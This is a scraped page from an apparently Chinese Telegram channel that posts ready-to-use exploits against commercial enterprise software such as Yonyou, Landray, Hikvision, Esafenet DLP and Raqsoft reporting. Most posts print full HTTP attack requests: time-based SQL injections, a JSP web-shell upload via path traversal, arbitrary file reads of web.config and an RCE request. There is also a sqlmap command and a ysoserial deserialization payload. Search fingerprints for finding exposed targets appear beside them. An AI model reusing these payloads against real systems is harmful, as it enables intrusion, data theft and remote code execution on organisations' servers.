NEW BOT Телеграм, страница

华磊科技物流-modifyInsurance-delay-pg-sql注入漏洞

body="l_c_bar"||body="l_c_center"

GET /modifyInsurance.htm?documentCode=-1&insuranceValue=-1&customerId=-1+and+1=(select+1+from+pg_sleep(6)) HTTP/1.1
Host:
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0

👍5

1.62K views03:41

踹哈公寓

https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6

1Panel SQL 注入致远程命令执行漏洞

GitHub

An SQL injection issue related to the orderBy clause.

### Summary
There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs.
The proof is as follows

### ...

1.6K views10:34

踹哈公寓

Forwarded from Hatsune Miku

1_HW2024-07-22-wb验真漏洞情报合集(1).pdf

1.7 MB

❤6

1.74K views11:19

踹哈公寓

亿赛通数据泄露防护(DLP)系统NetSecConfigAjax SQL注入漏洞

POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
Host: xxx.xxx
Content-Type: application/x-www-form-urlencoded

command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--

❤2

1.68K views14:43

踹哈公寓

启明星辰-天清汉马VPN-任意文件读取.docx

10.3 KB

👎8

2.05K views02:41

踹哈公寓

海康威视综合安防管理平台detection存在前台远程命令执行漏洞.docx

15.4 KB

👎6

2.08K views02:46

踹哈公寓

🤮7

1.6K views03:13

踹哈公寓

蓝凌OA系统前台存在远程代码执行漏洞.docx

14.2 KB

1.58K views07:15

踹哈公寓

https://mp.weixin.qq.com/s/nZRmObjI4_CiNdgYducGcg

1.6K views07:17

1.57K views10:56

福建科立讯那个是老day不是0，别传了

https://blog.csdn.net/qq_41904294/article/details/138583047

1.46K views10:58

踹哈公寓

润乾报表dataSphereServlet接口存在任意文件上传漏洞

body="润乾报表" || body="/raqsoft"

POST /servlet/dataSphereServlet?action=38 HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 397
Content-Type: multipart/form-data; boundary=eac629ee4641cb0fe10596fba5e0c5d9

--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="openGrpxFile"; filename="539634.jsp"
Content-Type: text/plain

<% out.println("123456"); %>
--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="path"

../../../
--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="saveServer"

1
--eac629ee4641cb0fe10596fba5e0c5d9--

上传后路径:网站根目录

👍1

1.55K views11:01

踹哈公寓

Forwarded from Hatsune Miku

微步在线-07-23.pdf

1.7 MB

赛博昆仑每日漏洞情报_20240723日报.pdf

1.5 MB

1.44K views03:58

踹哈公寓

启明星辰天玥网络安全审计系统 SQL注入漏洞

python sqlmap.py -u "https://ip/ops/index.php?c=Reportguide&a=checkrn" --data "checkname=123&tagid=123" --skip-waf --random-agent --dbs --batch --force-ssl

1.4K views04:24

踹哈公寓

蓝凌EKPsys_ui_component远程命令执行漏洞

POST /sys/ui/sys_ui_component/sysUiComponent.doHTTP/1.1
Host: Accept:application/json,text/javanoscript,*/*;q=0.01
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9,en;q=0.8
Connection:close
Content-Length:401
Content-Type:multipart/form-data;
boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
Origin:http://www.baidu.com
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36X-Requested-With:XMLHttpRequest

------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="method"
replaceExtend

------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="extendId"
../../../../resource/help/km/review/

------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="folderName"
../../../ekp/sys/common
------WebKitFormBoundaryL7ILSpOdIhIIvL51

1.38K viewsedited 04:24

踹哈公寓

赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞

GET /BaseModule/ReportManage/DownloadBuilder?filename=/../web.config HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close

1.28K viewsedited 04:27

踹哈公寓

数字通指尖云平台-智慧政务OA PayslipUser SQL注入漏洞

GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=%28SELECT+4655+FROM+%28SELECT%28SLEEP%285%29%29%29usQE%29 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*Connection: keep-alive

1.27K views04:29

踹哈公寓

用友U8Cloud MonitorServlet反序列化漏洞

java -jar ysoserial.jar CommonsCollections6 "ping dnslog.cn" > obj.ser

POST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1 
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36

payload

1.39K viewsedited 04:30

踹哈公寓

用友NC querygoodsgridbycodeSQL注入漏洞

GET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi HTTP/1.1
Host: 
Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Pragma: no-cache
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cache-Control: no-cache

👍1

1.35K views04:35

踹哈公寓

天问物业ERP系统AreaAvatarDownLoad任意文件读取漏洞

GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

1.38K viewsedited 04:36

About

Blog

Apps

Platform